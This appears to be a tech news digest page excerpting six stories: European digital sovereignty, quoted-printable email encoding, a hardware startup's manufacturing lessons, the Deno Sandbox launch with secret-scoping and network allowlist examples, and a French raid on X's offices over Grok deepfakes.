10 interesting stories served every morning and every evening.




1 873 shares, 60 trendiness

France dumps Zoom and Teams as Europe seeks digital autonomy from the US


LONDON (AP) — In France, civil ser­vants will ditch Zoom and Teams for a home­grown video con­fer­ence sys­tem. Soldiers in Austria are us­ing open source of­fice soft­ware to write re­ports af­ter the mil­i­tary dropped Microsoft Office. Bureaucrats in a German state have also turned to free soft­ware for their ad­min­is­tra­tive work.

Around Europe, governments and institutions are seeking to reduce their use of digital services from U.S. Big Tech companies and turning to domestic or free alternatives. The push for “digital sovereignty” is gaining attention as the Trump administration strikes an increasingly belligerent posture toward the continent, highlighted by recent tensions over Greenland that intensified fears that Silicon Valley giants could be compelled to cut off access.

Concerns about data pri­vacy and wor­ries that Europe is not do­ing enough to keep up with the United States and Chinese tech lead­er­ship are also fu­el­ing the drive.

The French government referenced some of these concerns when it announced last week that 2.5 million civil servants would stop using video conference tools from U.S. providers — including Zoom, Microsoft Teams, Webex and GoTo Meeting — by 2027 and switch to Visio, a homegrown service.

“The objective is to put an end to the use of non-European solutions, to guarantee the security and confidentiality of public electronic communications by relying on a powerful and sovereign tool,” the announcement said.

“We cannot risk having our scientific exchanges, our sensitive data, and our strategic innovations exposed to non-European actors,” David Amiel, a civil service minister, said in a press release.

Microsoft said it continues to “partner closely with the government in France and respect the importance of security, privacy, and digital trust for public institutions.”

The company said it is “focused on providing customers with greater choice, stronger data protection, and resilient cloud services — ensuring data stays in Europe, under European law, with robust security and privacy protections.”

Zoom, Webex and GoTo Meeting did not re­spond to re­quests for com­ment.

French President Emmanuel Macron has been pushing digital sovereignty for years. But there’s now a lot more “political momentum behind this idea now that we need to de-risk from U.S. tech,” said Nick Reiners, senior geotechnology analyst at the Eurasia Group.

“It feels kind of like there’s a real zeitgeist shift,” Reiners said.

It was a hot topic at the World Economic Forum’s annual meeting of global political and business elites last month in Davos, Switzerland. The European Commission’s official for tech sovereignty, Henna Virkkunen, told an audience that Europe’s reliance on others “can be weaponized against us.”

“That’s why it’s so important that we are not dependent on one country or one company when it comes to very critical fields of our economy or society,” she said, without naming countries or companies.

A de­ci­sive mo­ment came last year when the Trump ad­min­is­tra­tion sanc­tioned the International Criminal Court’s top pros­e­cu­tor af­ter the tri­bunal, based in The Hague, Netherlands, is­sued an ar­rest war­rant for Israeli Prime Minister Benjamin Netanyahu, an ally of President Donald Trump.

The sanctions led Microsoft to cancel Khan’s ICC email, a move that was first reported by The Associated Press and sparked fears of a “kill switch” that Big Tech companies can use to turn off service at will.

Microsoft maintains it kept in touch with the ICC “throughout the process that resulted in the disconnection of its sanctioned official from Microsoft services. At no point did Microsoft cease or suspend its services to the ICC.”

Microsoft President Brad Smith has repeatedly sought to strengthen trans-Atlantic ties, the company’s press office said, and pointed to an interview he did last month with CNN in Davos in which he said that jobs, trade and investment, as well as security, would be affected by a rift over Greenland.

“Europe is the American tech sector’s biggest market after the United States itself. It all depends on trust. Trust requires dialogue,” Smith said.

Other in­ci­dents have added to the move­ment. There’s a grow­ing sense that re­peated EU ef­forts to rein in tech gi­ants such as Google with block­buster an­titrust fines and sweep­ing dig­i­tal rule books haven’t done much to curb their dom­i­nance.

Billionaire Elon Musk is also a fac­tor. Officials worry about re­ly­ing on his Starlink satel­lite in­ter­net sys­tem for com­mu­ni­ca­tions in Ukraine.

Washington and Brussels wrangled for years over data transfer agreements, triggered by former National Security Agency contractor Edward Snowden’s revelations of U.S. cyber-snooping.

With on­line ser­vices now mainly hosted in the cloud through data cen­ters, Europeans fear that their data is vul­ner­a­ble.

U.S. cloud providers have responded by setting up so-called “sovereign cloud” operations, with data centers located in European countries, owned by European entities and with physical and remote access only for staff who are European Union residents.

“The idea is that only Europeans can take decisions so that they can’t be coerced by the U.S.,” Reiners said.

The German state of Schleswig-Holstein last year mi­grated 44,000 em­ployee in­boxes from Microsoft to an open source email pro­gram. It also switched from Microsoft’s SharePoint file shar­ing sys­tem to Nextcloud, an open source plat­form, and is even con­sid­er­ing re­plac­ing Windows with Linux and tele­phones and video­con­fer­enc­ing with open source sys­tems.

“We want to become independent of large tech companies and ensure digital sovereignty,” Digitalization Minister Dirk Schrödter said in an October announcement.

The French city of Lyon said last year that it’s de­ploy­ing free of­fice soft­ware to re­place Microsoft. Denmark’s gov­ern­ment and the cities of Copenhagen and Aarhus have also been try­ing out open-source soft­ware.

“We must never make ourselves so dependent on so few that we can no longer act freely,” Digital Minister Caroline Stage Olsen wrote on LinkedIn last year. “Too much public digital infrastructure is currently tied up with very few foreign suppliers.”

The Austrian mil­i­tary said it has also switched to LibreOffice, a soft­ware pack­age with word proces­sor, spread­sheet and pre­sen­ta­tion pro­grams that mir­rors Microsoft 365’s Word, Excel and PowerPoint.

The Document Foundation, a nonprofit based in Germany that’s behind LibreOffice, said the military’s switch “reflects a growing demand for independence from single vendors.” Reports also said the military was concerned that Microsoft was moving file storage online to the cloud — the standard version of LibreOffice is not cloud-based.

Some Italian cities and regions adopted the software years ago, said Italo Vignoli, a spokesman for The Document Foundation. Back then, the appeal was not needing to pay for software licenses. Now, the main reason is to avoid being locked into a proprietary system.

“At first, it was: we will save money and by the way, we will get freedom,” Vignoli said. “Today it is: we will be free and by the way, we will also save some money.”

Associated Press writer Molly Quell in The Hague, Netherlands con­tributed to this re­port.

This ver­sion cor­rects the con­tri­bu­tion line to Molly Quell in­stead of Molly Hague.

...

Read the original on apnews.com »

2 621 shares, 28 trendiness

What’s up with all those equals signs anyway?


For some reason or other, people have been posting a lot of excerpts from old emails on Twitter over the last few days. The most vital question everybody’s asking themselves is: What’s up with all those equals signs?!

And that’s something I’m somewhat of an expert on. I mean, having written mail readers and stuff; not because I’ve been to Caribbean islands. I’ve seen people confidently claim that it’s a code, or that it’s an artefact of scanning and then using OCR, but it’s neither — it’s just that whoever converted these emails to a readable format were morons.

What’s that you say? “Converted?! Surely emails are just text!!” Well, if you lived in the stone age (i.e., the 80s), they mostly were, but then people invented things like “long lines” and “rock döts”, and computers had to “encode” the mail before sending.

The artefact we see here is from something called “quoted printable”, or as we used to call it when it was introduced: “Quoted unreadable”.

To take the first line. Whoever wrote this, typed in the following in their mail reader:

    we talked about designing a pig with different non- cloven hoofs in order to make kosher bacon

We see that that’s quite a long line. Mail servers don’t like that, so mail software will break it into two lines, like so:

    we talked about designing a pig with different non- =
    cloven hoofs in order to make kosher bacon

See? There’s that equals sign! Yes, the equals sign is used to say “this should really be one single line, but I’ve broken it in two so that the mail server doesn’t get mad at me”.

The formal definition here is important, though, so I have to be a bit technical here: To say “this is a continuation line”, you insert an equals sign, then a carriage return, and then a line feed.

    =CRLF

    … non- =CRLF
    cloven hoofs…

When displaying this, we remove all these three characters, and end up with:

    … non- cloven hoofs…

So what’s happened here? Well, whoever collected these emails first converted from CRLF (also known as the “Windows” line ending coding, but it’s the standard line ending in the SMTP standard) to NL (i.e., “Unix” line ending coding). This is pretty normal if you want to deal with email. But you then have one byte fewer:

    … non- =NL
    cloven hoofs…

If your algorithm to decode this is, stupidly, “find equals signs at the end of the line, and then delete two characters, and then finally the equals sign”, you should end up with:

    … non- loven hoofs…

I.e., you lose the “c”. That’s almost what happened here, but not quite: Why does the equals sign still remain?

This StackOverflow post from 14 years ago explains the phenomenon, sort of:

Obviously the client notices that = is not followed by a proper CR LF sequence, so it assumes that it is not a soft line break, but a character encoded in two hex digits, therefore it reads the next two bytes. It should notice that the next two bytes are not valid hex digits, so its behavior is wrong too, but we have to admit that at that point it does not have a chance to display something useful. They opted for the garbage in, garbage out approach.

That is, equals signs are also used for something else besides wrapping long lines, and that’s what we see later in the post:

    =C2 please note

If the equals sign is not at the end of a line, it’s used to encode “funny characters”, like what you use with “rock döts”. =C2 is 194, which is a first character in a UTF-8 sequence, and the following char is most likely a =A0: =C2=A0 is “non-breakable space”, which is something people often use to indent text (and the “please note” is indented) and you see =A0 in many other places in these emails.

My guess is that whoever did this part just did a search-replace for =C2 and/or =A0 instead of using a proper decoder, but other explanations are certainly possible. Any ideas?

Anyway, that’s what’s up with those equals signs: 1) “it’s technical”, and 2) “it’s a combination of buggy continuation line decoding and buggy non-ASCII decoding”, and 3) “whoever processed these mails are incompetent”. I don’t think 2) should be very surprising at this point, do you?

(Edit a bit later: To nitpick a bit here: When the standard was written, people mostly envisioned that the quoted-printable content transport encoding would be unwound upon reception (note “transport”), and that you’d end up with “clean text” on disk after reception. This didn’t really happen, so all “real” implementations do the right thing with single-character (i.e., “unencoded”) newlines. For instance:

    (quoted-printable-decode-string "he=\nllo")
    => "hello"

Which leads me to assume that they reused an algo that was usually run in an SMTP server context to do the line unfolding — in that context, you can safely assume that the line ending is a CRLF. And by chance, this algo also works fine if you’re working with a Windows-based file, but fails for a Unix-based file.)
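The two decoding behaviours described above, side by side, as an added example (not code from the original post): a decoder that accepts both CRLF and bare-LF soft line breaks, the CRLF-only shortcut that eats the “c”, and a small check for leftover quoted-printable markers in text that was supposedly decoded. The function names and the sample message are constructed for illustration, and the charset is assumed to be UTF-8.

```javascript
// Constructed sample: the line quoted in the post, in SMTP wire form (CRLF).
const WIRE =
  "we talked about designing a pig with different non- =\r\n" +
  "cloven hoofs in order to make kosher bacon\r\n" +
  "=C2=A0 please note\r\n";
// The same message after a CRLF -> LF conversion (how it usually sits on a Unix disk).
const ON_DISK = WIRE.replace(/\r\n/g, "\n");

// The shortcut the post describes: see "=" at end of line, then blindly drop
// it plus the next two characters, assuming they are CR and LF.
function naiveDecode(text) {
  let out = "";
  for (let i = 0; i < text.length; i++) {
    const next = text[i + 1];
    if (text[i] === "=" && (next === "\r" || next === "\n")) {
      i += 2; // skip "=" and two more characters, whatever they are
      continue;
    }
    out += text[i];
  }
  return out;
}

// Sticky regexes: each must match exactly at lastIndex.
const SOFT_BREAK = /[ \t]*\r?\n/y; // tolerate trailing padding and bare LF
const HEX_ESCAPE = /[0-9A-Fa-f]{2}/y;

// Decoder that handles soft breaks with either line ending, turns =XX into
// raw bytes, and leaves a malformed "=" in place instead of eating data.
// Assumption: the input is the 7-bit ASCII encoded form and the charset is UTF-8.
function decodeQuotedPrintable(text) {
  const bytes = [];
  let i = 0;
  while (i < text.length) {
    if (text[i] !== "=") {
      bytes.push(text.charCodeAt(i));
      i += 1;
      continue;
    }
    SOFT_BREAK.lastIndex = i + 1;
    const soft = SOFT_BREAK.exec(text);
    if (soft) {
      i += 1 + soft[0].length; // drop "=" and the line ending only
      continue;
    }
    HEX_ESCAPE.lastIndex = i + 1;
    const hex = HEX_ESCAPE.exec(text);
    if (hex) {
      bytes.push(parseInt(hex[0], 16));
      i += 3;
      continue;
    }
    bytes.push(0x3d); // not a valid escape: keep the "=" literally
    i += 1;
  }
  return new TextDecoder("utf-8").decode(Uint8Array.from(bytes));
}

// Triage check for a processed corpus: count markers a decoder should have
// consumed. Ordinary text such as "x=AB" can also match, so treat the counts
// as a hint to re-run a proper decoder, not as proof.
function qpResidue(text) {
  return {
    softBreaks: (text.match(/=[ \t]*\r?\n/g) || []).length,
    hexEscapes: (text.match(/=[0-9A-F]{2}/g) || []).length,
  };
}

console.log(JSON.stringify(naiveDecode(ON_DISK)));
console.log(JSON.stringify(decodeQuotedPrintable(ON_DISK)));
console.log(qpResidue(naiveDecode(ON_DISK)));
```

Running `qpResidue` over an export before publishing it is a cheap way to notice that the decoding step was skipped or only half done.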

...

Read the original on lars.ingebrigtsen.no »

3 620 shares, 37 trendiness

Qwen

...

Read the original on qwen.ai »

4 477 shares, 57 trendiness

Lessons Learned Shipping 500 Units of my First Hardware Product

1 year ago (Jan 2025) I quit my job as a soft­ware en­gi­neer to launch my first hard­ware prod­uct, Brighter, the world’s bright­est lamp. In March, af­ter $400k in sales through our crowd­fund­ing cam­paign, I had to fig­ure out how to man­u­fac­ture 500 units for our first batch. I had no prior ex­pe­ri­ence in hard­ware; I was count­ing on be­ing able to pick it up quickly with the help of a cou­ple of me­chan­i­cal/​elec­tri­cal/​firmware en­gi­neers.

The prob­lems be­gan im­me­di­ately. I sent our pro­to­type to a test­ing lab to ver­ify the bright­ness and var­i­ous col­orime­try met­rics. The tagline of Brighter was it’s 50,000 lu­mens — 25x brighter than a nor­mal lamp. Instead, de­spite our plan­ning & cal­cu­la­tions, it tested at 39,000 lu­mens caus­ing me to panic (just a lit­tle).

So with all hands on deck, in a cou­ple of weeks we in­creased the power by 20%, re­designed the elec­tron­ics to han­dle more LEDs, in­creased the size of the heatsink to dis­si­pate the ex­tra power, and im­proved the trans­mis­sion of light through the dif­fuser.

This time, we over­shot to 60,000 lu­mens but I’m not com­plain­ing.

Confident in our new de­sign I gave the go ahead to our main con­tract man­u­fac­turer in China to start pro­duc­tion of me­chan­i­cal parts. The heatsink had the longest lead time as it re­quired a mas­sive two ton die cast­ing mold ma­chined over the course of weeks. I planned my first trip to China for when the process would fin­ish.

Simultaneously in April, Trump announced “Liberation Day” tariffs, taking the tariff rate for the lamp to 50%, promptly climbing to 100% then 150% with the ensuing trade war. That was the worst period of my life; I would go to bed literally shaking with stress. In my opinion, Not Cool!

I was ad­vised to press for­ward with man­u­fac­tur­ing be­cause 150% is bonkers and will have to go down. So 2 months later in Zhongshan, China, I’m star­ing at a heatsink that looks com­pletely fucked. Due to a mis­com­mu­ni­ca­tion with the fac­tory, the in­jec­tion pins were moved in­side the heatsink fins, caus­ing the cylin­dri­cal ex­tru­sions be­low. I was just glad at least the fac­tory ex­isted.

I re­turned in August to test the full as­sem­bly with the now cor­rect heatsink. At my elec­tron­ics fac­tory as soon as we con­nect all the wiring, we no­tice the con­trols are com­pletely un­re­spon­sive. By Murphy’s Law (anything that can go wrong will go wrong), I had ex­pected some­thing like this to hap­pen, so I made sure to visit the fac­tory at 10am China Standard time, al­low­ing me to co­or­di­nate with my elec­tri­cal en­gi­neer at 9pm ET and my firmware en­gi­neer at 7:30am IST. We’re mea­sur­ing volt­ages across every part of the lamp and none of it makes sense. I post­pone my next sup­plier visit a cou­ple days so I can get this sorted out. At the end of the day, we fi­nally no­tice the la­bels on two PCB pins were swapped.

With a func­tional fully as­sem­bled lamp, we OK mass pro­duc­tion of the elec­tron­ics.

Our first full pieces from the pro­duc­tion line come out mid October. I air­ship them to San Francisco, and hand de­liver to our first cus­tomers. The rest are sched­uled for con­tainer load­ing end of October.

People like the light! A big SF startup or­ders a lot more. However, there is one is­sue I hear mul­ti­ple times: the knobs are scrap­ing and feel hor­ri­ble. With days un­til the 500 units are loaded into the con­tainer, I fran­ti­cally call with the en­gi­neer­ing team and fac­tory. Obviously this should­n’t be hap­pen­ing, we de­signed a gap be­tween the knobs and the wall to spin freely. After rounds of back and forth and mea­sure­ments, we fig­ure out in the de­sign for man­u­fac­tur­ing (DFM) process, the draw­ings the CNC sub-sup­plier re­ceived did not have the la­bel for spac­ing be­tween the knobs, re­sult­ing in a 0.5mm larger dis­tance than in­tended. Especially com­bined with the white pow­der coat­ing which was thicker than the black fin­ish, this caused some knobs to scrape.

Miraculously, within the re­main­ing days be­fore ship­ment, the fac­tory re­makes & pow­der coats 1000 new knobs that are 1mm smaller in di­am­e­ter.

The fac­tory sends me pho­tos of the con­tainer be­ing loaded. I have 3 weeks un­til the lamps ar­rive in the US — I en­joy the time with­out last minute en­gi­neer­ing prob­lems, al­beit know­ing in­evitably prob­lems will ap­pear again when cus­tomers start get­ting their lamps.

The lamps are processed by our ware­house Monday, Dec 12th, and shipped out di­rectly to cus­tomers via UPS. Starting Wednesday, around ~100 lamps are get­ting de­liv­ered every day. I wake up to 25 cus­tomer sup­port emails and by the time I’m done an­swer­ing them, I get 25 more. The pri­mary is­sue peo­ple have is the bot­tom wires are too short com­pared to the tubes.

It was at this point I truly be­gan to ap­pre­ci­ate Murphy’s law. In my case, any­thing not pre­cisely spec­i­fied and tested would with­out fail go wrong and bite me in the ass. Although we had spec­i­fied the to­tal length of the ca­ble, we did­n’t de­fine the length of ca­ble pro­trud­ing from the base. As such, some as­sem­bly work­ers in the fac­tory put far too much wire in the base of the lamp, not leav­ing enough for it to be as­sem­bled. Luckily cus­tomers were able to fix this by un­screw­ing the base, but far from an ideal ex­pe­ri­ence.

There were other in­stances of qual­ity con­trol where I laughed at the ab­sur­dity: the lamp comes with a sheet of glass that goes over the LEDs, and a screw­driver & screws to at­tach it. For one cus­tomer, the screw­driver com­pletely broke. (First time in my life I’ve seen a bro­ken screw­driver…) For oth­ers, it came dull. The screw­driver sub sup­plier also shipped us two dif­fer­ent types of screws, some of which were per­fect, and oth­ers which were coun­ter­sunk and con­se­quently too short to be ac­tu­ally screwed in.

Coming from soft­ware, the most plan­ning you’re ex­posed to is lin­ear tick­ets, sprints, and set­ting OKRs. If you missed a dead­line, it’s of­ten be­cause you re-pri­or­i­tized, so no harm done.

In hardware, the development lifecycle of a product is many months. If you mess up tooling, or mass produce a part incorrectly, or just sub-optimally plan, you set back the timeline appreciably and there’s nothing you can do but curse yourself. I found myself reaching for more “old school” planning tools like Gantt charts, and also building my own tools. Make sure you have every step of the process accounted for. Assume you’ll go through many iterations of the same part; double your timelines.

In soft­ware, bud­get­ing is fairly lax, es­pe­cially in the VC funded startup space where all you need to know is your run­way (mainly cal­cu­lated from your em­ployee salaries and cloud costs).

With [profitable] hard­ware busi­nesses, your mar­gin for er­ror is much lower. Literally, your gross mar­gin is lower! If you sell out be­cause you miss a ship­ment or don’t fore­cast de­mand cor­rectly, you lose rev­enue. If you mis-time your in­ven­tory buy­ing, your bank ac­count can eas­ily go neg­a­tive. Accounting is a must, and the more de­tailed the bet­ter. Spreadsheets are your best friend. The fund­ing model is also much dif­fer­ent: in­stead of re­ly­ing heav­ily on eq­uity, most growth is debt-fi­nanced. You have real li­a­bil­i­ties!

Anything that can go wrong will go wrong. Anything you don’t spec­ify will fail to meet the im­plicit spec­i­fi­ca­tion. Any pro­ject or com­po­nent not ac­tively pushed will stall. At pre­vi­ous (software) com­pa­nies I’ve worked at, if some­one fol­lowed up on a task, I took it to mean the task was off track and some­body was to blame. With a hard­ware prod­uct, there are a mil­lion balls in the air and you need to keep track of all of them. Though some­what an­noy­ing, con­stant check­ins sim­ply math-out to be nec­es­sary. The cost of fail­ure or de­lays is too high. Nowadays as a con­tainer gets closer to ship­ment date, I have daily calls with my fac­to­ries. I found my­self agree­ing with a lot of Ben Kuhn’s blog post on run­ning ma­jor pro­jects (his blog post on light­ing was also a ma­jor in­spi­ra­tion for the prod­uct).

When I worked at Meta, every PR had to be ac­com­pa­nied with a test plan. I took that phi­los­o­phy to Brighter, try­ing to rig­or­ously test the out­comes we were aim­ing for (thermals, lu­mens, power, etc…), but I still en­coun­tered sur­pris­ing fail­ures. In soft­ware if you have cov­er­age for a code path, you can feel pretty con­fi­dent about it. Unfortunately hard­ware is al­most the op­po­site of re­peat­able. Blink and you’ll get a dif­fer­ent mea­sure­ment. I’m not an ex­pert, but at this point I’ve ac­cepted the only way to get a sem­blance of con­fi­dence for my met­rics is test­ing on mul­ti­ple units in dif­fer­ent en­vi­ron­ments.

As some­one who gen­er­ally stays out of pol­i­tics, I did­n’t know much about the in­com­ing ad­min­is­tra­tion’s stance to­wards tar­iffs, though I don’t think any­one could have pre­dicted such dras­tic hikes. Regardless, it’s some­thing you should be acutely aware of; take it into con­sid­er­a­tion when de­cid­ing what coun­try to man­u­fac­ture in, make sure it’s in your fi­nan­cial mod­els with room to spare, etc…

I wish I had vis­ited my sup­pli­ers much ear­lier, back when we were still pro­to­typ­ing with them. Price should­n’t be an is­sue — a trip to China is go­ing to be triv­ially cheap com­pared to buy­ing in­ven­tory, even more so com­pared to mess­ing up a man­u­fac­tur­ing run due to mis­com­mu­ni­ca­tion. Most sup­pli­ers don’t get in­ter­na­tional vis­i­tors of­ten, es­pe­cially Americans. Appearing in per­son con­veys se­ri­ous­ness, and I found it greatly im­proved com­mu­ni­ca­tion ba­si­cally im­me­di­ately af­ter my first visit. Plus China is very dif­fer­ent from the US and it’s cool to see!

To me, this process has felt like an ex­er­cise in mak­ing mis­takes and learn­ing painful lessons. However, I think I did do a cou­ple of key things right:

The first thing I did be­fore start­ing man­u­fac­tur­ing—and even be­fore the crowd­fund­ing cam­paign—was set­ting up a sim­ple web­site where peo­ple could pay $10 to get a steep dis­count off the MSRP. Before I com­mit­ted time and money, I needed to know this would be self-sus­tain­ing from the get go. It turns out that peo­ple were happy to give their email and put down a de­posit, even when the only prod­uct pho­tos I had were from a ren­der artist on fiverr!

From talk­ing to other hard­ware founders, these kinds of mis­takes hap­pen to every­one; hard­ware is hard as they say. It’s im­por­tant to have a healthy enough busi­ness model to stom­ach these mis­takes and still be able to grow.

Coolest Cooler had an in­cred­i­bly suc­cess­ful crowd­fund­ing cam­paign, partly be­cause they packed a lot of fea­tures into a very at­trac­tively priced prod­uct. Unfortunately, it was too at­trac­tively priced, and part­way through man­u­fac­tur­ing they re­al­ized they did­n’t have enough money to ac­tu­ally de­liver all the units, lead­ing to a slow and painful bank­ruptcy.

When the first 500 units were be­ing de­liv­ered, I knew there were bound to be is­sues. For that first week, I was lit­er­ally chron­i­cally on my gmail. I would try to re­spond to every cus­tomer sup­port is­sue within 1-2 min­utes if pos­si­ble (it was not con­ducive to my sleep that many of our cus­tomers were in the EU).

Some cus­tomers still had some is­sues with the con­trol tube knobs & firmware. I ac­knowl­edged that they were sub­par and de­cided to re-make the full batch of con­trol tubes prop­erly (with the cor­rect knob spac­ing), as well as up­dated firmware & other im­prove­ments, and ship them to cus­tomers free of charge.

Overall, it’s been a very different but incredibly rewarding experience compared to working as a software engineer. It’s so cool to see something I built in my friends’ houses, and equally cool when people leave completely unprompted reviews:

...

Read the original on www.simonberens.com »

5 384 shares, 28 trendiness

Introducing Deno Sandbox

Over the past year, we’ve seen a shift in what Deno Deploy cus­tomers are build­ing: plat­forms where users gen­er­ate code with LLMs, and that code runs im­me­di­ately with­out re­view. That code fre­quently calls LLMs it­self, which means it needs API keys and net­work ac­cess.

This isn’t the traditional “run untrusted plugins” problem. It’s deeper: LLM-generated code, calling external APIs with real credentials, without human review. Sandboxing the compute isn’t enough. You need to control network egress and protect secrets from exfiltration.

Deno Sandbox pro­vides both. And when the code is ready, you can de­ploy it di­rectly to Deno Deploy with­out re­build­ing.

You don’t want to run untrusted code (generated by your LLMs, your users’ LLMs, or even hand written by users) directly on your server. It will compromise your system, steal your API keys, and call out to evil.com. You need isolation.

Deno Sandbox gives you light­weight Linux mi­croVMs (running in the Deno Deploy cloud) to run un­trusted code with de­fense-in-depth se­cu­rity. You cre­ate or pro­gram­mat­i­cally via our JavaScript or Python SDKs, and they boot in un­der a sec­ond. You can also in­ter­act with them via SSH, HTTP, or even open a VS Code win­dow di­rectly into the sand­box.

    import { Sandbox } from "@deno/sandbox";

    // Create a sandbox and run a shell command inside it.
    await using sandbox = await Sandbox.create();
    await sandbox.sh`ls -lh /`;

But there is more. In Deno Sandbox, se­crets never en­ter the en­vi­ron­ment. Code sees only a place­holder:

    import { Sandbox } from "@deno/sandbox";

    await using sandbox = await Sandbox.create({
      secrets: {
        OPENAI_API_KEY: {
          // The real value is only used for requests to these hosts.
          hosts: ["api.openai.com"],
          value: process.env.OPENAI_API_KEY,
        },
      },
    });

    // Inside the sandbox the variable holds a placeholder, not the key.
    await sandbox.sh`echo $OPENAI_API_KEY`;
    // DENO_SECRET_PLACEHOLDER_b14043a2f578cba75ebe04791e8e2c7d4002fd0c1f825e19…

The real key materializes only when the sandbox makes an outbound request to an approved host. If prompt-injected code tries to exfiltrate that placeholder to evil.com? Useless.

You can also re­strict which hosts the sand­box can talk to:

    await using sandbox = await Sandbox.create({
      // Only these hosts are reachable from inside the sandbox.
      allowNet: ["api.openai.com", "*.anthropic.com"],
    });

Any re­quest to an un­listed host gets blocked at the VM bound­ary.

Both features are implemented via an outbound proxy similar to coder/httpjail. This gives us a chokepoint for policy enforcement. We plan to add more capabilities here: analytics for outbound connections and programmatic hooks for trusted code to inspect or modify requests.

If you’re running untrusted JavaScript or TypeScript, combine this with Deno’s --allow-net flag for defense in depth: VM-level network restrictions plus runtime-level permissions.
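To make the chokepoint idea concrete, here is an added example that models the two policies an outbound proxy can enforce: a host allowlist and per-host secret substitution. It is not Deno's implementation and does not use the @deno/sandbox SDK; `makeEgressPolicy`, `hostMatches`, the placeholder format, the wildcard semantics and the sample key are all assumptions made for illustration.

```javascript
// Assumed wildcard semantics for this model: "*.example.com" matches any
// subdomain of example.com but not example.com itself, and never a lookalike
// such as "evilexample.com".
function hostMatches(pattern, host) {
  const h = host.toLowerCase().replace(/\.$/, ""); // drop a trailing root dot
  const p = pattern.toLowerCase();
  if (p.startsWith("*.")) {
    const suffix = p.slice(1); // ".example.com"
    return h.length > suffix.length && h.endsWith(suffix);
  }
  return h === p;
}

function makeEgressPolicy({ allowNet, secrets }) {
  // The sandbox only ever sees the placeholder; the real value stays here,
  // on the proxy side. (Placeholder format is made up for this example.)
  const table = Object.entries(secrets).map(([name, s], i) => ({
    name,
    hosts: s.hosts,
    value: s.value,
    placeholder: `EXAMPLE_SECRET_PLACEHOLDER_${i}_${name}`,
  }));

  return {
    // Environment handed to the untrusted code.
    env() {
      return Object.fromEntries(table.map((e) => [e.name, e.placeholder]));
    },

    // Decision for one outbound request: { url, headers }.
    filter(request) {
      const host = new URL(request.url).hostname;
      if (!allowNet.some((p) => hostMatches(p, host))) {
        return { action: "block", host, reason: "host not in allowNet" };
      }
      const headers = {};
      for (const [key, raw] of Object.entries(request.headers)) {
        let value = raw;
        for (const e of table) {
          // Swap in the real secret only for hosts that secret is scoped to.
          // Anywhere else the placeholder is forwarded unchanged.
          if (value.includes(e.placeholder) &&
              e.hosts.some((p) => hostMatches(p, host))) {
            value = value.split(e.placeholder).join(e.value);
          }
        }
        headers[key] = value;
      }
      return { action: "forward", host, headers };
    },
  };
}

// Constructed configuration mirroring the snippets above; the key is fake.
const policy = makeEgressPolicy({
  allowNet: ["api.openai.com", "*.anthropic.com"],
  secrets: {
    OPENAI_API_KEY: { hosts: ["api.openai.com"], value: "sk-constructed-example" },
  },
});

const seenBySandbox = policy.env().OPENAI_API_KEY;
for (const url of [
  "https://api.openai.com/v1/models",       // allowed, secret in scope
  "https://api.anthropic.com/v1/messages",  // allowed, secret out of scope
  "https://evil.com/collect",               // not allowed
]) {
  const verdict = policy.filter({
    url,
    headers: { authorization: `Bearer ${seenBySandbox}` },
  });
  console.log(url, "->", verdict.action, verdict.headers ?? verdict.reason);
}
```

Every host listed for a secret receives the real value, so keep each secret's `hosts` list as narrow as the API it is actually used with.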

sand­box.de­ploy() de­ploys code from your sand­box di­rectly to Deno Deploy.

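    // Deploy the sandbox contents to Deno Deploy without a separate build step.
    const build = await sandbox.deploy("my-app", {
      production: true,
      build: { mode: "none", entrypoint: "server.ts" },
    });

    // Wait for the deployment to finish, then print its URL.
    const revision = await build.done;
    console.log(revision.url);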

One call to go from sand­box to pro­duc­tion de­ploy­ment. No re­build­ing in a dif­fer­ent CI sys­tem, no re-au­then­ti­cat­ing with a dif­fer­ent tool. Just turn your dev en­vi­ron­ment di­rectly into a pro­duc­tion ready, auto-scal­ing server­less de­ploy­ment.

Sandboxes are ephemeral by de­fault, but when you need state we have you cov­ered:

Run apt-get in­stall once, snap­shot it, and every fu­ture sand­box boots with every­thing al­ready in­stalled. Create read-write vol­umes from the snap­shots to cre­ate a fresh de­vel­op­ment en­vi­ron­ment in sec­onds.

Deno Sandbox is in­cluded in your Deno Deploy plan with com­pet­i­tive, us­age-based pric­ing. You pay for com­pute time, not wall-clock time.

We’re ex­cited to see what you (or your AI agents) build with Deno Sandbox.

...

Read the original on deno.com »

6 286 shares, 16 trendiness

X offices raided in France as prosecutors investigate child abuse images and deepfakes


PARIS (AP) — French pros­e­cu­tors raided the of­fices of so­cial me­dia plat­form X on Tuesday as part of a pre­lim­i­nary in­ves­ti­ga­tion into al­le­ga­tions that in­clude spread­ing child sex­ual abuse im­ages and deep­fakes. They have also sum­moned bil­lion­aire owner Elon Musk for ques­tion­ing.

X and Musk’s ar­ti­fi­cial in­tel­li­gence com­pany xAI also face in­ten­si­fy­ing scrutiny from Britain’s data pri­vacy reg­u­la­tor, which opened for­mal in­ves­ti­ga­tions into how they han­dled per­sonal data when they de­vel­oped and de­ployed Musk’s ar­ti­fi­cial in­tel­li­gence chat­bot Grok.

Grok, which was built by xAI and is avail­able through X, sparked global out­rage last month af­ter it pumped out a tor­rent of sex­u­al­ized non­con­sen­sual deep­fake im­ages in re­sponse to re­quests from X users.

The French investigation was opened in January last year by the prosecutors’ cybercrime unit, the Paris prosecutors’ office said in a statement. It’s looking into alleged “complicity” in possessing and spreading pornographic images of minors, sexually explicit deepfakes, denial of crimes against humanity and manipulation of an automated data processing system as part of an organized group, among other charges.

Prosecutors asked Musk and former CEO Linda Yaccarino to attend “voluntary interviews” on April 20. Employees of X have also been summoned that same week to be heard as witnesses, the statement said. Yaccarino was CEO from May 2023 until July 2025.

In a post on its own service denying the allegations, X railed against the raid on its Paris office as “an abusive act of law enforcement theater designed to achieve illegitimate political objectives rather than advance legitimate law enforcement goals rooted in the fair and impartial administration of justice.”

In a mes­sage posted on X, the Paris pros­e­cu­tors’ of­fice an­nounced the on­go­ing searches at the com­pa­ny’s of­fices in France and said it was leav­ing the plat­form while call­ing on fol­low­ers to join it on other so­cial me­dia.

“At this stage, the conduct of the investigation is based on a constructive approach, with the aim of ultimately ensuring that the X platform complies with French law, as it operates on the national territory,” the prosecutors’ statement said.

European Union police agency Europol “is supporting the French authorities in this,” Europol spokesperson Jan Op Gen Oorth told the AP, without elaborating.

French au­thor­i­ties opened their in­ves­ti­ga­tion af­ter re­ports from a French law­maker al­leg­ing that bi­ased al­go­rithms on X likely dis­torted the func­tion­ing of an au­to­mated data pro­cess­ing sys­tem.

